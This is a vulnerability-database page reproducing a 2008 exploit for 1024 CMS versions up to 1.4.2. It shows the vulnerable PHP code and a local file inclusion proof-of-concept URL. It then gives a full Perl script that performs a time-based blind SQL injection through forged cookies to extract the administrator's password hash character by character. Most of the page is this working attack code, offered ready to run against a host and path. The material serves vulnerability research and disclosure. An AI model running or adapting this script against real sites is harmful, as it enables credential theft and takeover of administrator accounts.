Vulners
Lucene search
1024 CMS <= 1.4.2 Local File Inclusion / Blind SQL Injection Exploit
# Author: __GiReX__
# mySite: girex.altervista.org
# Date: 13/04/2008
# CMS: 1024 CMS <= 1.4.1 and 1.4.2 (beta)
# Site: 1024cms.com
# Bug1: Local File Inclusion
# Need: magic_quotes_gpc = Off / register_globals = On
# Bug2: Cookie Blind SQL Injection
# Exploit: Admin Hash Retrieve Exploit
# Need: magic_quotes_gpc = Off
# Bug1: Vuln Code: pages/print/default/ops/news.php
<?php
if(!isset($_GET['id']) || !is_numeric($_GET['id'])) die("ID Not Set");
include("./lang/".$lang."/news/default.php");
# $lang is unset so we can exploit through local file inclusion
# Include a local file in CMS directory
# PoC: [host]/[path]/pages/print/default/ops/news.php?id=1&lang=../../../../../[local file]%00
# Bug2: Vuln Code: /includes/system.php: Lines 66-71
if(!isset($_SESSION['logged']) && (isset($_COOKIE['cookuid']) && isset($_COOKIE['cookpass']) &&
isset($_COOKIE['cooktype']) && isset($_COOKIE['cooklogged']))){
$_SESSION['logged'] = $_COOKIE['cooklogged'];
$_SESSION['user'] = $_COOKIE['cookuid'];
$_SESSION['type'] = $_COOKIE['cooktype'];
$chk_comb = mysql_query("SELECT id, type, warning, banned FROM ".$prefix."users
WHERE username='".$_SESSION['logged']."' AND password='".$_COOKIE['cookpass']."'")
or die("Cannot check combination: ".mysql_error());
# We can exploit this vulnerable query editing our cookies and making a blind sql injection
### Start Exploit ###
#!/usr/bin/perl -w
# 1024 CMS <= 1.4.2 (beta) Remote Blind SQL Injection
# Admin Hash Retrieve Exploit
use LWP::UserAgent;
use HTTP::Request;
if(not defined $ARGV[0])
{
print "usage: perl $0 [host] [path]\n";
print "example: perl $0 localhost /1024/\n";
exit;
}
my $client = new LWP::UserAgent;
my @cset = (48..57, 97..102);
my $hash = undef;
my $host = ($ARGV[0] =~ /^http:\/\//) ? $ARGV[0]: 'http://' . $ARGV[0];
$host .= $ARGV[1] unless not defined $ARGV[1];
banner();
check_vuln($host) or die "[-] Site not vulnerable: maybe magic_quotes_gpc = On\n\n";
syswrite(STDOUT, "[+] Admin Hash: ");
for($j = 1; $j <= 32; $j++)
{
for($i = 0; $i <= $#cset; $i++)
{
$pre_time = time();
$rv = check_char($cset[$i], $j);
$post_time = time();
if($post_time - $pre_time > 3 and $rv)
{
$hash .= chr($cset[$i]);
syswrite(STDOUT, chr($cset[$i]), 1);
last;
}
}
}
if(not defined $hash or length($hash) != 32)
{
print STDOUT "\n[-] Exploit mistake: please check the benchmark and the sql query\n\n";
}
else
{
print STDOUT "\n[+] Exploit terminated\n\n";
}
sub banner
{
print "\n";
print "[+] 1024 CMS <= 1.4.2 (beta) Remote Blind SQL Injection\n";
print "[+] Admin Hash Retrieve Exploit\n";
print "[+] Coded by __GiReX__\n";
print "\n";
}
sub check_vuln
{
my $target = shift;
$get = new HTTP::Request(GET, $target);
$get->header(Cookie => "cookpass=-1'; cookuid=0; cooktype=0; cooklogged=0; cookuser=0");
$res = $client->request($get);
if($res->is_success)
{
return 1 if $res->as_string =~ /Cannot check combination/;
}
else
{
die "[-] Invalid target : ${target}\n\n";
}
return 0;
}
sub check_char
{
my ($char, $n) = @_;
$get->header(Cookie => 'cookpass=-1\'+AND+'.
'CASE+WHEN(SELECT ASCII(SUBSTRING(password,'.$n.',1))+'.
'FROM+otatf_users+WHERE+id=1)='.$char.'+'.
'THEN+BENCHMARK(90000000,CHAR(0))+END#; '.
'cookuid=1; cooktype=1; cooklogged=1; cookuser=1');
$res = $client->request($get);
return $res->is_success;
}
# milw0rm.com [2008-04-13]
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
13 Apr 2008 00:00Current
7.1High risk
Vulners AI Score7.1